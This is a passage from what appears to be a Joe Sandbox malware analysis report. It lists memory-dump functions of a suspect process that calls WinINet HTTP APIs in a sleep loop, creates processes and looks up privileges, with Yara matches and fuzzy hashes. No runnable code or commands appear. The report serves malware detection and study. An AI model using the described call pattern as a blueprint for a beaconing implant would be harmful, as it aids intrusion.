                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 106 2a8aa70-2a8aaa6 107 2a8aaaf-2a8aab6 106->107 108 2a8aaaa call 2a8b010 106->108 109 2a8aab8-2a8aade HttpOpenRequestA 107->109 110 2a8aadf-2a8aae5 107->110 108->107
                                          APIs
                                          • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02A8AAD8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpOpenRequest
                                          • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                          • API String ID: 1984915467-4016285707
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 111 2a8aae7-2a8aae8 112 2a8aaea-2a8ab36 call 2a8b010 111->112 113 2a8ab55-2a8ab59 111->113 116 2a8ab38-2a8ab52 HttpSendRequestA 112->116 117 2a8ab53 112->117 117->113
                                          APIs
                                          • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 02A8AB4C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpRequestSend
                                          • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                          • API String ID: 360639707-2503632690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 118 2a8aa66-2a8aab6 call 2a8b010 121 2a8aab8-2a8aade HttpOpenRequestA 118->121 122 2a8aadf-2a8aae5 118->122
                                          APIs
                                          • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 02A8AAD8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpOpenRequest
                                          • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                          • API String ID: 1984915467-4016285707
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 123 2a8aaf0-2a8ab26 124 2a8ab2f-2a8ab36 123->124 125 2a8ab2a call 2a8b010 123->125 126 2a8ab38-2a8ab52 HttpSendRequestA 124->126 127 2a8ab53-2a8ab59 124->127 125->124
                                          APIs
                                          • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 02A8AB4C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpRequestSend
                                          • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                          • API String ID: 360639707-2503632690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 129 2a8a9f0-2a8aa36 call 2a8b010 132 2a8aa38-2a8aa5e InternetConnectA 129->132 133 2a8aa5f-2a8aa65 129->133
                                          APIs
                                          • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 02A8AA58
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ConnectInternet
                                          • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                          • API String ID: 3050416762-1024195942
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 134 2a8a980-2a8a9c1 call 2a8b010 137 2a8a9de-2a8a9e4 134->137 138 2a8a9c3-2a8a9dd InternetOpenA 134->138
                                          APIs
                                          • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02A8A9D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InternetOpen
                                          • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                          • API String ID: 2038078732-3155091674
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 139 2a8a978-2a8a9af 140 2a8a9ba-2a8a9c1 139->140 141 2a8a9b5 call 2a8b010 139->141 142 2a8a9de-2a8a9e4 140->142 143 2a8a9c3-2a8a9dd InternetOpenA 140->143 141->140
                                          APIs
                                          • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 02A8A9D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InternetOpen
                                          • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                          • API String ID: 2038078732-3155091674
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 376 2a89080-2a890c2 call 2a8bd40 379 2a890c8-2a89118 call 2a8be10 call 2a7acf0 call 2a84e50 376->379 380 2a8919c-2a891a2 376->380 387 2a89120-2a89131 Sleep 379->387 388 2a89133-2a89139 387->388 389 2a89196-2a8919a 387->389 390 2a8913b-2a8915c call 2a88ca0 388->390 391 2a89163-2a89184 call 2a88eb0 388->391 389->380 389->387 394 2a89161 390->394 395 2a89189-2a8918c 391->395 394->395 395->389
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 02A89128
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 396 2a89077-2a890c2 call 2a8bd40 400 2a890c8-2a89118 call 2a8be10 call 2a7acf0 call 2a84e50 396->400 401 2a8919c-2a891a2 396->401 408 2a89120-2a89131 Sleep 400->408 409 2a89133-2a89139 408->409 410 2a89196-2a8919a 408->410 411 2a8913b-2a89161 call 2a88ca0 409->411 412 2a89163-2a89184 call 2a88eb0 409->412 410->401 410->408 416 2a89189-2a8918c 411->416 412->416 416->410
                                          APIs
                                          • Sleep.KERNELBASE(000007D0), ref: 02A89128
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleep
                                          • String ID: net.dll$wininet.dll
                                          • API String ID: 3472027048-1269752229
                                          • Opcode ID: 35f58ad24640e47bbf166df9fec5bf4f82bb783751ccfc450772771136f4143d
                                          • Instruction ID: e8ad444022eb6b8da77896a77512cd5e54fee84ecb68742fabcc4e2fcca444bc
                                          • Opcode Fuzzy Hash: 35f58ad24640e47bbf166df9fec5bf4f82bb783751ccfc450772771136f4143d
                                          • Instruction Fuzzy Hash: 6221C1B2940305BBC714EF64CCC5F7BB7B9FB48B04F008119E629AB285DB74A554CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A73AF8), ref: 02A8A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction ID: f1d3e4b2d0ac60d2a99ca921de3bda0432a481a5ff4051c46ef9d454eb21188a
                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction Fuzzy Hash: ACE04FB12002086BD714EF59CC44EA777ADEF88750F118559FD0C57241C630F910CAF0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A7836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A7838B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 66398f3613db91332ac68618874db6c600fffb51e4998f08aea36f5e7e5188f1
                                          • Instruction ID: 7315865609ba452f0d54d43b213d991270a42e1ba75bb3bac08f64790bb4964c
                                          • Opcode Fuzzy Hash: 66398f3613db91332ac68618874db6c600fffb51e4998f08aea36f5e7e5188f1
                                          • Instruction Fuzzy Hash: BE01D432AC02287BE720AA94DD82FFE772D9B40B50F050154FF04BA1C1EAA869064BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A7836A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A7838B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                          • Instruction ID: 58b15c0833288d20ac0d9c77a2c16d6450091104face3792cb1c5b190051d8ce
                                          • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                          • Instruction Fuzzy Hash: A801A232A802287BE720B6949D46FFE776D5B40F54F050159FF04BA1C1EAA869064BFA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A7AD62
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction ID: 9526894d3558c415b75d924a7a8e444366463bf8bb2ee0157f3c7c8a9719e4f0
                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction Fuzzy Hash: FF015EB5D4020DBBDF10EBA0DD81FDDB3799B04308F004595EA0897281FA31E7048B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A8A734
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction ID: 4bffac924a8efe3f76e8c16543759974bc5a34ef2ae5fc7275db5f35a3a90171
                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction Fuzzy Hash: B701AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A8A734
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: eef9103121d579d30522e56b7f0902beac61e250371fd68b76095a2b2c29faff
                                          • Instruction ID: 2e870c08810269fa09f1c540bdd3232c9683f3ed56207c74892e7dd5c1e241b5
                                          • Opcode Fuzzy Hash: eef9103121d579d30522e56b7f0902beac61e250371fd68b76095a2b2c29faff
                                          • Instruction Fuzzy Hash: 3801F6B2205149BFCB54DF88DC80EEB77ADAF8C354F158249FA0D97251C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A7F050,?,?,00000000), ref: 02A891EC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 514acbfe814dae774e6785729ff0828b898ddd06b24f7590d82b321662d1b142
                                          • Instruction ID: 3ac02ac42f08e07d74be40612f099c5e359ecd60828f6f13cec34a494935b0ee
                                          • Opcode Fuzzy Hash: 514acbfe814dae774e6785729ff0828b898ddd06b24f7590d82b321662d1b142
                                          • Instruction Fuzzy Hash: BCE06D373802043AE6207599AC02FA7B29D8B81B20F550026FA4DEA6C0E995F40146A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(02A84536,?,02A84CAF,02A84CAF,?,02A84536,?,?,?,?,?,00000000,00000000,?), ref: 02A8A65D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction ID: 2b0098762f3fb7836c1ec45c1d5b4c793ee64285fd138b0a81aecb7ac7e8f93f
                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction Fuzzy Hash: 3EE012B2200208ABDB14EF99CC40EA777ADEF88654F118559BA085B242CA30F9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A7F1D2,02A7F1D2,?,00000000,?,?), ref: 02A8A800
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction ID: ab53a13aaaba17df2864d090f87d140ed3cab89f5c5cadc6a2b1c3d7704de7fa
                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction Fuzzy Hash: 84E01AB12002086BDB10EF49CC84EE737ADEF88650F118155BA0C57241C934E8108BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,02A78D14,?), ref: 02A7F6FB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_2a70000_control.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                          • Instruction ID: 7911821a7bf4bdc314bbd60f674380e556b8ee5fa4f2e088de9f9e6464f7bfad
                                          • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                          • Instruction Fuzzy Hash: 94D05E626903092AE610BAA49C02F6632C95B44A04F4A0064FA48D62C3ED50E1014565
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d243f2813af7275ab7247c42cf77a7a5c8784be1b48a35f51acd562f74051e80
                                          • Instruction ID: 388b4bd5bed131a3895259046db351f2f9b7518b1da6fbf756d14c4da8a7d75e
                                          • Opcode Fuzzy Hash: d243f2813af7275ab7247c42cf77a7a5c8784be1b48a35f51acd562f74051e80
                                          • Instruction Fuzzy Hash: 73B04C719015C595EB11A760460961679506B90705F15C461E2024651A4728E591E175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04DC4742
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04DC4787
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04DC46FC
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04DC4725
                                          • ExecuteOptions, xrefs: 04DC46A0
                                          • Execute=1, xrefs: 04DC4713
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04DC4655
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: 65a69d219c33270a71f380c64fc307748cad087480c6fc5f15482e1d54f58b9c
                                          • Instruction ID: 9a27db486afa8e48776dc57963d7ec1e1ceb59aab44b256b32b77291261e79af
                                          • Opcode Fuzzy Hash: 65a69d219c33270a71f380c64fc307748cad087480c6fc5f15482e1d54f58b9c
                                          • Instruction Fuzzy Hash: 7851E235740219BAEF10BBA59C96BBE77A8FF44305F2400ADE505A7280EB70BE458E60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction ID: a65100f04a5b08ec286669183fb2fc62d6096d77569a9c22b5bc5d4db3801e91
                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction Fuzzy Hash: 3D819E70E052499EDF24CE68E8917FEBBE2BF45310F1A465BD891EB290D634BC408B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • RTL: Re-Waiting, xrefs: 04DC031E
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04DC02BD
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04DC02E7
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          • Opcode ID: db61b24b477986d8c4ea8e280d166ebe0f99964c251c3690eeb576804e9dcf66
                                          • Instruction ID: 2cee14a2b2ce9a13498a422990f9517b05151a694ce14526a7be257a20f438ba
                                          • Opcode Fuzzy Hash: db61b24b477986d8c4ea8e280d166ebe0f99964c251c3690eeb576804e9dcf66
                                          • Instruction Fuzzy Hash: F0E18C70604742DFDB25CF68C884B2AB7E0FB89328F140A5DE5A58B2E1E774F945CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04DC7B7F
                                          • RTL: Resource at %p, xrefs: 04DC7B8E
                                          • RTL: Re-Waiting, xrefs: 04DC7BAC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 0-871070163
                                          • Opcode ID: 598ae5ebc7c3153e2775a619c9a8d59fbf27cfdcb4efc784c8b5206fbfc93509
                                          • Instruction ID: f5a346ce49cc63349d9af065d269f1f5633f50d0fc4a9112a53f0a51b8e78737
                                          • Opcode Fuzzy Hash: 598ae5ebc7c3153e2775a619c9a8d59fbf27cfdcb4efc784c8b5206fbfc93509
                                          • Instruction Fuzzy Hash: F541CD357007029FDB21EE25C840B6AB7E5FB88724F100A1EF89ADB281DB31F8058F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04DC728C
                                          Strings
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04DC7294
                                          • RTL: Resource at %p, xrefs: 04DC72A3
                                          • RTL: Re-Waiting, xrefs: 04DC72C1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
                                          • Associated: 00000005.00000002.4532616564.0000000004E49000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004E4D000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4d20000_control.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          • Opcode ID: a4c504dea726d247b49db828e6e0809108f49e79d28bf491346692c6745e1d7f
                                          • Instruction ID: 1ae3b2225b88730f65470b8d4a3a801f66dd80b4e8d16140d849265e2e3dffc8
                                          • Opcode Fuzzy Hash: a4c504dea726d247b49db828e6e0809108f49e79d28bf491346692c6745e1d7f
                                          • Instruction Fuzzy Hash: 5941F031700203ABEB21EE25CC42B66B7A5FB84718F14061DF995EB280DB20F8069BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D20000, based on PE: true
